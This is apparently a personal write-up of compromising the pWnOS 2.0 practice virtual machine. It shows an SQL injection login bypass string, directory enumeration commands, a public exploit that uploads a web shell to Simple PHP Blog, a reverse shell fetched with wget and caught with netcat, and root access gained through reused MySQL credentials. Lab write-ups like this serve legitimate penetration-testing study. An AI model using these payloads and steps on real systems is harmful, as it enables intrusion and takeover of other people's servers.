About pWnOS 2.0 (Pre-Release)
This virtual machine required some initial configuration on VMware. The virtual machine has already been assigned a static IP of 10.10.10.100 and therefore the attacking machine had to be place on the /24 network to be able to reach it. I will not go through the setup but just keep that in mind if you are trying to work on this machine. While this is an easy machine I had fun doing it, I also kept overthinking the last part without trying the most simple things first.
This machine has more than one way to get access. My approach was to enumerate the web service to discover a blog page which I then further enumerated to find a version for possible exploits. After gaining a low privilege shell as www-data, I escalated my privileges to root by using some credentials belonging to MySQL.
Scanning and Enumeration
Running a full TCP scan on nmap returns only 2 ports being ssh a an http service.
By opening up a browser and navigating to the http service displays a page with a welcome message to an internal website.
Looking at the options on the right side of the page, there is an option to Login, and navigating to it seemed viable to me.
The login page looks very simple and I thought it would be worth trying a common SQL injection to bypass authentication. Instead of typing an email address I typed the following:
test' or 1=1 -- -
and then just typed anything as a password. I was able to successfully bypass authentication and was able to see an email address.
Unfortunately the page just kept saying “Logging in…” with no other interesting information (after rooting the machine I realized that I could had remote execution at this point). Instead of trying other types of SQL injections I further enumerated the web service using gobuster. This is the command I used to enumerate the service.
gobuster dir -u http://10.10.10.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -x php,txt
These are the results that I obtained from gobuster:
From here navigating to the blog directory displays a different page where a post has been made and another link to log in.
From here I thought It would be a good idea to further enumerate the blog. Once again I used gobuster to enumerate directories and files with php and txt extensions but this time starting from the blog directory as follows:
gobuster dir -u http://10.10.10.110/blog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -x php,txt
These are the results:
There were many more options this time but after trying to access the most interesting ones I navigated to the /blog/docs directory and then found some interesting files that could give me a little more information.
Opening the TODO.TXT file shows some information regarding Simple PHP blog, versions and some tasks that were to be done. Scrolling down to the end reveals what could it be the latest version running on the target machine as 0.4.x.
At this point I had a name for the service running under the blog site and a possible version of 0.4.x. Doing a google search for exploits on Simple PHP blog 0.4 took me to this link: https://www.exploit-db.com/exploits/1191. The exploit is a perl script that covers multiple vulnerabilities in Simple PHP blog, but the one that was most interesting for me was the uploading of files vulnerability via POST. The script uploads a web shell to the images directory that can be used to execute remote commands. To accomplish this I executed the perl script as follows:
perl exploit.pl -h http://10.10.10.100/blog -e 1
The “-e 1” switch tells the script to use the uploading method and to upload a web shell.
Once the script is executed, the web shell can be accessed inside /blog/images as cmd.php. From there I was able to execute commands.
To get a reverse shell instead of just executing commands from the browser, I uploaded a php reverse shell which can be found here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
I only edited the file with my IP address and a port of 443. After making those small changes, I hosted the php reverse shell from my attacking machine on port 80 using python as follows:
python -m SimpleHTTPServer 80
I then used wget from the web shell to download the reverse shell into the same directory.
Using netcat and listening on port 443, I navigated to the php-reverse-shell.php file within the browser under the /blog/images directory and was able to successfully gain a reverse shell as the www-data user.
To get a little more practice I decided to upgrade my netcat session to an interactive shell which I background by pressing ctrl+z. I then examined my current terminal by using echo and stty:
Keeping in mind the information I received from those two commands. The next step was to set my current STTY shell to type raw and tell it to echo the input characters, this was accomplished with the following command:
stty raw -echo
After this, the terminal would not work properly and will not display anything that is typed, with the shell as it is, I typed “fg” to foreground my netcat session and then typed reset to get get my shell back. With the information I had obtained before about my STTY shell I excuted the following commands to suit my terminal configuration to my reverse shell.
stty rows 53 columns 235
By now I had an interactive shell (meaning that things like pressing TAB will work).
For privilege escalation, by looking around the file system I was able to find MySQL information inside the var directory in the mysqli_connect.php
Connecting to MySQL with those credentials reveals some information about in the ch16 database about the users for the web service (test is a user a had created).
Using the hash from Dan’s password I did a quick google search to find the password and it was: killerbeesareflying
The password didn’t work to get access as the Dan user, however with the password I had found to access MySQL I attempted to su into root and was able to successfully become root.